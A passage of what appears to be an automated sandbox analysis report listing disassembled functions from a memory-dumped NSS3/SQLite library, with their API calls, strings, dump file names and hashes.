Instruction Fuzzy Hash: 3E72A070E04205CFDB24CF68C484BAABBF1BF49308F1486ADD8159BB52D775E846CBA5

Function 6C799C40 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 565COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,00000000,6C66C52B), ref: 6C799D53
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014960,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C79A035
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000149AD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C79A114

Strings

database corruption, xrefs: 6C79A029, 6C79A108
%s at line %d of [%.10s], xrefs: 6C79A02E, 6C79A10D
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C79A01F, 6C79A0E4, 6C79A0FE

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: sqlite3_log$memcmp
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 717804543-598938438
Opcode ID: 26d92d915acf9f3757cc8e517e78b19df10502348fbb32e80cbfe5a111d13224
Instruction ID: 3807ab582d53c315b13359ae59d898e3fe7a83b7319eb76f2ddad14e64a3ec93
Opcode Fuzzy Hash: 26d92d915acf9f3757cc8e517e78b19df10502348fbb32e80cbfe5a111d13224
Instruction Fuzzy Hash: DC22DD71A093418FD704CF29D69062AB7F1BFDA358F048A2DE8DA97B51E731E845CB42

Function 6C7B9D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6C678637,?,?), ref: 6C7B9E88
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6C678637), ref: 6C7B9ED6

Strings

database corruption, xrefs: 6C7B9ECA
%s at line %d of [%.10s], xrefs: 6C7B9ECF
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C7B9EC0

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: 1bfbaea6241e32f740659bf73db36085bb61b4edc3b5c418384b3cf770cc330c
Instruction ID: 9c2629ffb933d51a59104d2e3bbc52c92b24ba87c87db639d034e42d05a303ca
Opcode Fuzzy Hash: 1bfbaea6241e32f740659bf73db36085bb61b4edc3b5c418384b3cf770cc330c
Instruction Fuzzy Hash: 7381A431B011058FDB14CFAACA85ADEB7F6EF68314B148529E829BB741E730ED45CB90

Function 6C7C7F20 Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 713COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,?), ref: 6C7C81BC

Strings

out of memory, xrefs: 6C7C835B
BINARY, xrefs: 6C7C8126

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: memset
String ID: BINARY$out of memory
API String ID: 2221118986-3971123528
Opcode ID: 3dcb5cb47ac0d1ff1134939e1222d6ddd17b9cb1e756dda652d67f2972f118ac
Instruction ID: a4e368bef82e336c611373931c588ac5a914226b4a767c6f286f2632e64fb828
Opcode Fuzzy Hash: 3dcb5cb47ac0d1ff1134939e1222d6ddd17b9cb1e756dda652d67f2972f118ac
Instruction Fuzzy Hash: B852BE71E00219DFDB14CF99C990BAEBBB2FF48318F25816ED815AB751D730A846CB91

Function 6C749EC0 Relevance: 7.6, APIs: 5, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C749ED6

Part of subcall function 6C7414C0: TlsGetValue.KERNEL32 ref: 6C7414E0
Part of subcall function 6C7414C0: EnterCriticalSection.KERNEL32 ref: 6C7414F5
Part of subcall function 6C7414C0: PR_Unlock.NSS3 ref: 6C74150D

PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C749EE4

Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C7410F3
Part of subcall function 6C7410C0: EnterCriticalSection.KERNEL32(?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74110C
Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741141
Part of subcall function 6C7410C0: PR_Unlock.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741182
Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74119C

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C749F38

Part of subcall function 6C74D030: PORT_NewArena_Util.NSS3(00000400,00000000,?,00000000,?,6C749F0B), ref: 6C74D03B
Part of subcall function 6C74D030: PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C74D04E
Part of subcall function 6C74D030: SECOID_FindOIDByTag_Util.NSS3(00000019), ref: 6C74D07B
Part of subcall function 6C74D030: SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000), ref: 6C74D08E
Part of subcall function 6C74D030: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C74D09D

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C749F49
SEC_PKCS7DestroyContentInfo.NSS3(?), ref: 6C749F59

Part of subcall function 6C749D60: PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C749C5B), ref: 6C749D82
Part of subcall function 6C749D60: PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C749C5B), ref: 6C749DA9
Part of subcall function 6C749D60: PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C749C5B), ref: 6C749DCE
Part of subcall function 6C749D60: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C749C5B), ref: 6C749E43

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Arena_CriticalEnterErrorGrow_Mark_SectionUnlock$AllocateContentCopyDestroyFindFreeInfoItem_Tag_
String ID:
API String ID: 4287675220-0
Opcode ID: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
Instruction ID: c64954fb71024c23864c4da15fbc52c5a74501605a99ec7294e8bf206029eb45
Opcode Fuzzy Hash: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
Instruction Fuzzy Hash: 61112BB5F042015BF7009A65AF09B9B7398AFA435DF148234E90A8B750FB61E918C292

Function 6C7FCDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7FD086
PR_Malloc.NSS3(00000001), ref: 6C7FD0B9
PR_Free.NSS3(?), ref: 6C7FD138

Strings

>, xrefs: 6C7FCF5B

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: bad61377ace01b752319316e472b51f0210202d9d9e1c0294a2629f151eb27dd
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: 95D19A22B446464BFB244C7C8EE13EAB79387A33B5F684339D1318BBE5E6198843D305

Function 6C79AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a61f83e1fe691f764900a066b30eea57bba6571c8e6096199bce616bac73a55
Instruction ID: c5644f17dfbb0e6a4afef43acb5f3abae060b24d33effe74f091340451b084c9
Opcode Fuzzy Hash: 8a61f83e1fe691f764900a066b30eea57bba6571c8e6096199bce616bac73a55
Instruction Fuzzy Hash: 52F1DC71E012258BEB34CFA8EA503A977B0BB8A30CF15963DC909D7B50E774A951CBC0

Function 6C78DFC0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 344stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C665001,?,00000003,00000000), ref: 6C78DFD7
memset.VCRUNTIME140(00000000,00000000,?,?,?,00000003,?,6C665001,?), ref: 6C78E2B7
memcpy.VCRUNTIME140(00000028,00000003,?,?,?,?,?,?,00000003,?,6C665001,?), ref: 6C78E2DA

Strings

W, xrefs: 6C78E111

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: memcpymemsetstrlen
String ID: W
API String ID: 160209724-655174618
Opcode ID: 74bf7f2737e018faf0262bdf28d00906165d4528ebd9e25a26f0dead84b9203c
Instruction ID: 5cd5745e8fd6725d96b145dcef4cfa821f500b2056641675e589b9e2c654cf8c
Opcode Fuzzy Hash: 74bf7f2737e018faf0262bdf28d00906165d4528ebd9e25a26f0dead84b9203c
Instruction Fuzzy Hash: D2C11939E0665E8BDB04CE25C5807AA77B2BF86308F288579DE699BB41D7319C01C7D0

Function 6C750E20 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C751052
memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C751086

Strings

h(ul, xrefs: 6C750E55, 6C750EC4, 6C750F3A, 6C750FA7
h(ul, xrefs: 6C751062, 6C75105D, 6C750F37, 6C751081, 6C751082

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: memcpymemset
String ID: h(ul$h(ul
API String ID: 1297977491-8822764
Opcode ID: 30f783f81abe4f44bcf8994661ac9a97490e65421c9db50265b96c51d645aa37
Instruction ID: 0fa07fc837d7f206c5f579035f30085b006ad1aa0cb74d498979c1ab089a9ea6
Opcode Fuzzy Hash: 30f783f81abe4f44bcf8994661ac9a97490e65421c9db50265b96c51d645aa37
Instruction Fuzzy Hash: 89A16071B0124A9FDF08DF99C994AEEB7B6BF88318B548139E904A7700DB35EC11CB90

Function 6C676F10 Relevance: 5.2, Strings: 4, Instructions: 218COMMON

Download Yara Rule

Strings

noskipscan*, xrefs: 6C677067
*?[, xrefs: 6C677034, 6C677052, 6C677070
sz=[0-9]*, xrefs: 6C677049
unordered*, xrefs: 6C67702B

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID:
String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
API String ID: 0-3485574213
Opcode ID: cf5d0af1b26de977df2774054437d52ef3fdcea87b80e521b6687ca5e3f6cc3a
Instruction ID: 0c979901b6bc198d50ca1576f2a70533d6f805ea9eca7d89c755d295dfe6ebff
Opcode Fuzzy Hash: cf5d0af1b26de977df2774054437d52ef3fdcea87b80e521b6687ca5e3f6cc3a
Instruction Fuzzy Hash: 9D717C72F102154BDB318E6DC8803DA7392DF81318F290A39CD59ABBD1D6759C46C7E9

Function 6C693EC0 Relevance: 4.3, Strings: 3, Instructions: 583COMMON

Download Yara Rule

Strings

sqlite_temp_master, xrefs: 6C69460F
sqlite_, xrefs: 6C693FAA, 6C694185
sqlite_master, xrefs: 6C69463F

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID:
String ID: sqlite_$sqlite_master$sqlite_temp_master
API String ID: 0-4221611869
Opcode ID: 0aad299b32092c8c95053fbf464a78dded00714a26e9000706fa2e2c3fcb98a5
Instruction ID: 27fbdcad738bc3c4cc2dd2e2c24ce4746c194f448ecc2729825fa981985c787e
Opcode Fuzzy Hash: 0aad299b32092c8c95053fbf464a78dded00714a26e9000706fa2e2c3fcb98a5
Instruction Fuzzy Hash: 6022793064C1974FD7148B7984A06F6BBF2AF46318BA849A8C9F19FF42C761EC45C798

Function 6C7CBE70 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 1029COMMON

Download Yara Rule

Strings

`, xrefs: 6C7CC0B6

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 482698daac8e21aec28ad9c8d203229955412f3c10c152021d9a3d877ef0eeb7
Instruction ID: 183723ebc090168c8e41c8f26ac742376128e5df14cd5f4c8666de9599b4813a
Opcode Fuzzy Hash: 482698daac8e21aec28ad9c8d203229955412f3c10c152021d9a3d877ef0eeb7
Instruction Fuzzy Hash: C792A170B0024A8FDB04DF59CA80BAEB7B6FF49309F284168D815A7B91D735EC46CB56

Function 6C663D80 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164COMMON

Download Yara Rule

APIs

htonl.WSOCK32(00000000), ref: 6C663EA9

Strings

0, xrefs: 6C663DAB

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: htonl
String ID: 0
API String ID: 2009864989-4108050209
Opcode ID: 778c4c1ba3dd4c2c398359d84ac5aad42e4c65db46c71be9bb77c56267d6b381
Instruction ID: df86dd9ee93f00e888a8833fde2f5b300b829c801ae1399888f24ba340f23863
Opcode Fuzzy Hash: 778c4c1ba3dd4c2c398359d84ac5aad42e4c65db46c71be9bb77c56267d6b381
Instruction Fuzzy Hash: 85512931E490798AEB15467E88603FFBBB19B82324F19433BC5A567EC1D234454787F6

Function 6C70EE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C70F019
PK11_GenerateRandom.NSS3(?,00000000), ref: 6C70F0F9

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: ErrorGenerateK11_Random
String ID:
API String ID: 3009229198-0
Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction ID: 3856b4e70c8a7675578320dc74e8ac0b48a41337c1aabe0399a3536c57d33ff1
Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction Fuzzy Hash: 6F91AFB1B0161A8BCB14CF68C9906AEB7F1FF85324F24472DD962A7BC1D730A905CB50

Function 6C732F70 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6C757929), ref: 6C732FAC
PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6C757929), ref: 6C732FE0

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Error
String ID:
API String ID: 2619118453-0
Opcode ID: 3428f47d3df5d1dbfbd7c558c6648c7579c04968f9c330d2a52231358d6ce4cb
Instruction ID: e60c5f7a98e795597e670abf27c657662b0b03f6e70500e8f82817b377b8483c
Opcode Fuzzy Hash: 3428f47d3df5d1dbfbd7c558c6648c7579c04968f9c330d2a52231358d6ce4cb
Instruction Fuzzy Hash: A3510471A049318FD7208E55CA84B6A73B2EB45328F296279D90D9BB03C739E847CBC1

Function 6C67AC60 Relevance: 2.7, Strings: 2, Instructions: 181COMMON

Download Yara Rule

Strings

winUnlock, xrefs: 6C67AE18
winUnlockReadLock, xrefs: 6C67AE9F

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID:
String ID: winUnlock$winUnlockReadLock
API String ID: 0-3432436631
Opcode ID: 27c4d14721273270e01d52c8344501a569315009c8f65675a1dfa127b9c1c101
Instruction ID: a4e623daad83fda29e03b6ad775e3ce8d2e725f5e64d2dd3f503dbd74a053caf
Opcode Fuzzy Hash: 27c4d14721273270e01d52c8344501a569315009c8f65675a1dfa127b9c1c101
Instruction Fuzzy Hash: 3E7193716082409BDB24DF24D884AABB7F5FF89318F14DA28F94997241E730ED85CBD5

Function 6C73ED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C73EE3D

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction ID: 41157dcf754f84fbb0cb0fb0a65985af36bae6c7e42e860b3f574cbcad3ab14d
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: D871E372E0171A8FE718CF19C98066AB7F2ABC8304F15562DD85A97B92D770ED00CB90

Function 6C665F30 Relevance: 1.6, APIs: 1, Instructions: 350stringCOMMON

Download Yara Rule

APIs

